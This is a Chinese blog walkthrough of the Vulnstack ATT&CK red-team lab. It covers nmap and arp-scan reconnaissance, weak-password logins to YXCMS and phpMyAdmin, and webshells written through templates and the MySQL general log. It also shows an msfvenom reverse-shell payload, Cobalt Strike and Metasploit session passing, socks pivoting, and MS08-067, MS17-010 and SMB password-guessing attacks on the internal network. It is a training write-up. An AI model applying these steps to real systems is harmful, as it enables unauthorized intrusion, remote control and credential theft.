首页 > 其他分享 >红日安全-ATT& CK实战:Vulnstack靶场实战

红日安全-ATT& CK实战:Vulnstack靶场实战

时间:2024-10-28 22:20:21浏览次数:3  
标签:实战 CK nmap 扫描 192.168 漏洞 Vulnstack 使用 MSF

安全提示:该篇内容仅可用于学习

任务要求

环境配置

下载靶场;网卡配置;检测联通性;开启web服务。

信息收集

使用Nmap扫描;使用kali Linux访问目标80端口;使用御剑后台扫描工具扫描。

漏洞利用

yxcms漏洞(信息泄露+后台弱密码);

phpadmin弱口令漏洞;

yxcms的留言板存在存储型xss漏洞;

yxcms后台存在任意文件读写漏洞;

开启全局日志getshell;

反弹shell,MSF监听;

MSF提权;

使用Cobalt Strike;

系统信息收集;

1主机密码收集;

1CS与MSF联动;

MSF下的会话传给CS;

使用cs的socks功能将msf带入内网。

 内网攻击

MS08-067;SMB远程桌面口令猜测;RPC DCOM 服务漏洞;ms17-010。

横向移动

实操过程

图1 某公司内网网络拓扑

内网实战

环境配置

VM1win 7 VM2win 2003 VM3win 2008

服务开启

使用上面的账号密码打开win 7靶机的服务,然后使用win 7中的浏览器访问127.0.0.1,查看服务是否开启

信息收集

探测目标

arp扫描器

Kali自带了arp扫描器,可以通过这个工具扫描出和自身网卡同一网段的主机

arp-scan -l                                      #扫描网段所有主机

arp-scan -I eth0 -l                          #扫描指定网段所有ip

nmap
nmap -sn 192.168.123.0/24 

端口服务

nmap
nmap -T4 -p- 192.168.154.129				#T4是扫描速度
nmap -T4 -O -sV -p- 192.168.154.129		&		namp -A 192.168.154.129

#个人常用第一条,可以探测出操作系统,端口、端口服务及服务版本信息

#如果使用 参数:-A 的话会更详细,但也会更慢

masscan

目录扫描

御剑

漏洞分析

备份文件

文件名为:yxcms,猜测路径为:http://192.168.123.129/yxcms

主页敏感信息

PHPMyAdmin

http://192.168.123.129/phpmyadmin/

默认后台

漏洞利用

Yxcms后台模板 Getshell  弱口令登录

在上面信息收集处看到了默认密码admin/123456

访问Yxcms的默认后台路径进行登录

http://192.168.123.129/yxcms//index.php?r=admin/index/login

模板写一句话 

看到有个前台模板,既然是模板,那应该有写入shell的地方。

点击前台模板>管理模板文件>点击编辑

访问主页面(http://192.168.123.129/yxcms/)可以发现主页面出现了phpinfo和一堆字符串,此刻可以用菜刀连接了,连接上了,shell也就到手了。

进行文件目录查找,最后找到木马生成后的位置在/yxcms/protected/apps/default/view/default/路径下,如下:

PHPMyAdmin日志 Getshell

弱口令登录PHPMyAdmin

在配置文件中发现了数据库的账号密码root / root,访问PHPMyAdmin并使用root登录

http://192.168.123.129/phpmyadmin/

into outfile写入一句话

into outfile写入的条件如下:

root权限

知道绝对路径

phpmyadmin 日志写入一句话

show global variables like "%general%";

可以使用下面的命令行进行修改

C:/phpStudy/WWW/a.php

set global general_log="on";                                         #开启日志,修改为on

set global general_log_file="C:/phpStudy/WWW/l.php";          #修改日志路径(在上面提到的phpinfo.php中有泄露路径)

蚁剑连shell

在上面可以知道我们是直接将l.php写在C盘的WWW中的,所以直接访问,然后使用蚁剑连接

http://192.168.123.129/l.php

反弹shell,MSF监听;

在kali上生成shell.exe

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.123.178 LPORT=1111 -f exe -o shell.exe

-p为指定payload,使用msf的payload的时候要和这个相同,lhost为自己ip,lport为自己端口,-f为payload类型

上传到服务器上

使用蚁剑将文件上传到服务器上

msf开启监听

在蚁剑命令行中运行shell.exe

MSF提权;

使用Cobalt Strike;

CS配置

创建了artifact.exe用蚁剑放入win7

连接成功

系统信息收集;

主机密码收集;

CS与MSF联动;

这里payload需要选择Foreign HTTP

MSF下的会话传给CS;

击Cobalt Strike然后选择监听器,创建一个HTTPS Beacon的监听器即可创建成功后如下

开始传递会话

CS上已经可以看到MSF的会话传递过来了

使用cs的socks功能将msf带入内网。

msf配置:

粘贴cs生成的命令

setgProxiessocks4:192.168.123.178:17071

setg ReverseAllowProxy true 允许反向代理

修改/etc/proxychains.conf文件

内网信息收集

补丁信息收集

安装软件信息

查看路由信息

arp扫描52网段

使用meterpreter关闭防火墙,再使用nmap扫描

使用nmap的vuln漏洞扫描脚本进行扫描

使用msf辅助模块进行扫描,查看是否存在ms17-010漏洞

在cs上使用目标机器上的nmap,对内网其他主机进行扫描

内网攻击

MS08-067;

使用cs将msf带入内网后,使用ms08-067攻击模块攻击内网主机,注意使用的是反向代理,所以这里payload需要使用正向

漏洞利用成功

SMB远程桌面口令猜测;

使用msf的smb口令猜测模块,配置参数用于smb口令爆破

RPC DCOM 服务漏洞;

漏洞原理:

微软修改 dcerpc 框架后形成自己的 RPC 框架来处理进程间的通信。微软的 RPC 框架在处理 TCP/IP 信息交换过程中存在的畸形消息时,未正确处理,导致缓冲区溢出漏洞;此漏洞影响使用 RPC 框架的 DCOM 接口,DCOM 接口用来处理客户端机器发送给服务器的 DCOM 对象激活请求,如 UNC 路径

ms17-010

横向移动

渗透

扫描141的时候发现开了445端口,尝试使用MS17_010

清理痕迹

标签:实战,CK,nmap,扫描,192.168,漏洞,Vulnstack,使用,MSF
From: https://blog.csdn.net/weixin_59151049/article/details/143314474

相关文章

  • 机器学习实战——基于粒子群优化算法(PSO)优化支持向量回归(SVR)模型(附完整代码)
    基于粒子群优化算法优化支持向量回归模型(附完整代码)关于作者作者:小白熊作者简介:精通python、matlab、c#语言,擅长机器学习,深度学习,机器视觉,目标检测,图像分类,姿态识别,语义分割,路径规划,智能优化算法,数据分析,各类创新融合等等。联系邮箱:[email protected]科研辅导、知识付......
  • LockSupport
    LockSupport是什么LockSupport是用来创建锁和其他同步类的基本线程阻塞原语,其中park()和unpack()而作用分别是阻塞线程和解除阻塞线程.线程等待唤醒机制三种让线程等待和唤醒的方法方式一:使用Object中的wait()方法让线程等待,使用Object中的notify()方法唤醒线程方式二:使用J......
  • 基于YOLOv8深度学习的吸烟/抽烟行为检测系统【python源码+Pyqt5界面+数据集+训练代码
    背景及意义吸烟行为检测对于维护公共场所的健康环境、防止火灾事故的发生以及促进健康生活方式都具有重要作用。使用基于YOLOv8的吸烟行为检测系统能够有效识别视频中的吸烟行为,从而及时采取适当措施。本文基于YOLOv8深度学习框架,通过2357张图片,训练了一个进行吸烟行为的......
  • 基于YOLOv10/YOLOv9/YOLOv8深度学习的工业螺栓螺母检测系统【python源码+Pyqt5界面+数
    背景及意义工业螺栓螺母检测系统的实施显著提高了制造行业的产品质量和工作效率。该系统的应用涵盖了从生产、检查到包装等各个环节,为精密设备的维护和安全运行提供了强大的技术支持。本文基于YOLOv10/YOLOv9/YOLOv8深度学习框架,通过2548张工业螺栓螺母的相关图片,训练了可......
  • 基于YOLOv10/v9/v8深度学习的金属焊缝缺陷检测系统【python源码+Pyqt5界面+数据集+训
    背景及意义金属焊缝缺陷检测系统的实现显著提高了众多工业领域产品的安全性和可靠性。自动化的检测过程不仅增加了工作效率,还降低了人力成本和事故风险。本文基于YOLOv10/v9/v8深度学习框架,通过3170张金属焊缝缺陷的相关图片,训练了可进行焊缝缺陷目标检测的模型,可以分别......
  • 《Dead Cide Club死神俱乐部》报错大揭秘:innocallback.dll文件丢失的解决办法
    对于热爱《DeadCideClub死神俱乐部》这款游戏的玩家来说,遇到游戏报错,特别是提示“innocallback.dll文件丢失”时,无疑是一件令人沮丧的事情。然而,不必过于担心,本文将为你揭秘这一问题的原因,并提供详细的解决办法,帮助你迅速恢复游戏的正常运行。一、了解innocallback.dll文件......
  • centos中docker安装mysql
    用来记录1先升级yumupdate,遇到问题,解决在上篇centos7yum报错Cannotfindavalidbaseurlforrepo:base/7/x86_642安装docker需要的工具包3配置docker的yum源位置报错,网上查询说是因为国内访问不到docker官方镜像,但是直接在网页里打开连接可以下载,换成阿里云后成......
  • docker是什么?
    Docker是一种开源的容器化平台,可以将应用程序与其依赖项打包到一个称为容器的独立单元中。容器是一个可移植和可扩展的环境,内含应用程序的代码、运行时环境、系统工具、系统库等。它允许开发人员将应用程序与其依赖项一起打包,以便在任何地方运行,无论是开发环境、测试环境还是生......
  • 使用 Docker可以 做什么?
    我可以使用Docker 快速、一致地交付您的应用程序。Docker允许开发人员使用提供应用程序和服务的本地容器在标准化环境中工作,从而简化了开发生命周期。容器非常适合持续集成和持续交付(CI/CD)工作流。考虑以下示例场景:您的开发人员在本地编写代码并使用Docker容器与同......
  • C# SuperSocket 基础七【CountSpliterReceiveFilte-固定数量分隔符协议】不使用COMMAN
    publicclassCountSpliterReceiveFilterSession:AppSession<CountSpliterReceiveFilterSession>{publicoverridevoidSend(stringmessage){Console.WriteLine("发送消息:"+message);base.Send(message)......